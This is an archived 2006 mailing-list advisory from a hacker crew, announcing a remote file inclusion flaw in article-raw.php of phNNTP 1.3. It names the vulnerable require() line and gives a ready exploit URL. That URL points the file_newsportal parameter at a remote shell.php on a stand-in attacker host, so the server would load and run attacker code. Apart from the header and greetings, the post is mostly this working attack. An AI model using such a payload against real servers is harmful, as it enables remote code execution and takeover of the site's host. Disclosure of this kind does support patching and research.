|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
tr_zindan
wolfsecurity.org
Date: Tue Aug 08 2006 - 12:13:35 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
phNNTP v1.3 Remote File Inclusion
CreW: ToxiC
By:Tr_ZiNDaN
mail:tr_zindanwolfsecurity.org
Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz
Problem Is:
require("$file_newsportal");
Page Affect:
article-raw.php
Path:
Declare file_newsportal
ExPLoit:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
Greatz: WolfSecurtyTeam,EL_MuHaMMED,CyberWolf...
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]